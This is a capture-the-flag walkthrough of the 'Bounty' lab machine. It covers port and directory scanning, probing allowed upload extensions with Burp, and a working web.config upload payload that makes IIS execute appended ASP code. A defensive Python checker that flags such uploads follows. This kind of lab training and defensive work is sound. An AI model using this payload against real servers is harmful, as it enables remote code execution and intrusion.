# Scanning and Enumeration

## Scanning

```
kali@kali:~$ nmap -sC -sV -p 80 10.10.10.93
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-25 09:33 EST
Nmap scan report for 10.10.10.93
Host is up (0.077s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.30 seconds
```

## Enumeration

### Port 80

![](/files/-MN9ZewRgmjXBeySP3Nm)

### Gobuster Scan

```
kali@kali:~/HTB/Bounty$ gobuster dir --url http://10.10.10.93/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.93/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     aspx
[+] Timeout:        10s
===============================================================
2020/11/27 11:35:07 Starting gobuster
===============================================================
/transfer.aspx (Status: 200)

```

![](/files/-MN9Zruz_A5zWjtoFv-J)

Looks like we can upload images. That's all good, but there is a way with Burp to check which file extensions the upload accepts. This can be super useful when conducting a penetration test and save a lot of time. Here is how to do so.

### BurpSuite

Create an extensions file to test which extensions the application accepts:

```
vi extensions
* php
* aspx 
* php7
* php
* config
* cgi
* exe 
```

![](/files/-MN9y0SBn8cbBqkDMHrB)

Intercept a file upload request, then send it to Repeater and Intruder.

![](/files/-MNA-jck_qg5SNV8ugSJ)

![](/files/-MNA-qFkXEWOqwT16dd2)

![](/files/-MNA-eZn16i8xvhC0rfm)

{% embed url="https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/" %}

{% embed url="https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/" %}

Looks like we can execute code by uploading a modified web.config with our ASP code appended at the end.

```
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
```

![](/files/-MNA1zhbHKxmnIFGG94R)
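As an added defender-side example (not code from the writeup or from the two posts linked above), the screen below is what an upload handler or file-integrity check could run over an incoming web.config to catch the three changes that make this file dangerous (the handler mapping to asp.dll, the removal of `.config` from request filtering, the un-hiding of web.config) and the script block riding after the XML root; `audit_web_config`, `accept_upload`, `SCRIPT_ENGINES` and the condensed sample are assumptions of this example.

```python
import re
import xml.etree.ElementTree as ET

# Script engines an uploaded handler mapping should never be allowed to name.
SCRIPT_ENGINES = ("asp.dll", "aspnet_isapi.dll", "php-cgi.exe")

def audit_web_config(text):
    """Return the reasons an uploaded web.config is dangerous (empty list = clean)."""
    findings = []
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        return [f"malformed XML: {exc}"]
    for add in root.iter("add"):                      # <handlers><add .../>
        proc = add.get("scriptProcessor", "").lower()
        if any(engine in proc for engine in SCRIPT_ENGINES):
            findings.append(f"handler maps {add.get('path')} to {proc}")
    for rem in root.iter("remove"):                   # request-filtering rollbacks
        if rem.get("fileExtension", "").lower() == ".config":
            findings.append("unblocks .config in requestFiltering")
        if rem.get("segment", "").lower() == "web.config":
            findings.append("unhides web.config")
    # The ASP payload rides in an XML comment placed after the root element.
    tail = text[text.rfind("</configuration>"):]
    if re.search(r"<%.*?%>", tail, re.S):
        findings.append("script block <% ... %> after the XML root")
    return findings

def accept_upload(filename, allowed=("jpg", "jpeg", "png", "gif")):
    """Allow-list the extension AND reject the server-interpreted name outright."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    return ext in allowed and name != "web.config"

# Constructed sample: the upload from the writeup, condensed to its three tricks.
MALICIOUS = """<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer>
  <handlers accessPolicy="Read, Script, Write">
    <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
         scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll" resourceType="Unspecified" />
  </handlers>
  <security><requestFiltering>
    <fileExtensions><remove fileExtension=".config" /></fileExtensions>
    <hiddenSegments><remove segment="web.config" /></hiddenSegments>
  </requestFiltering></security>
</system.webServer></configuration>
<!-- <% Response.write(1+2) %> -->
"""
BENIGN = '<?xml version="1.0"?><configuration><system.webServer/></configuration>'
```

`audit_web_config(MALICIOUS)` returns four findings and `audit_web_config(BENIGN)` none; `accept_upload("web.config")` is rejected by name even if `.config` were ever added to the allow-list.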
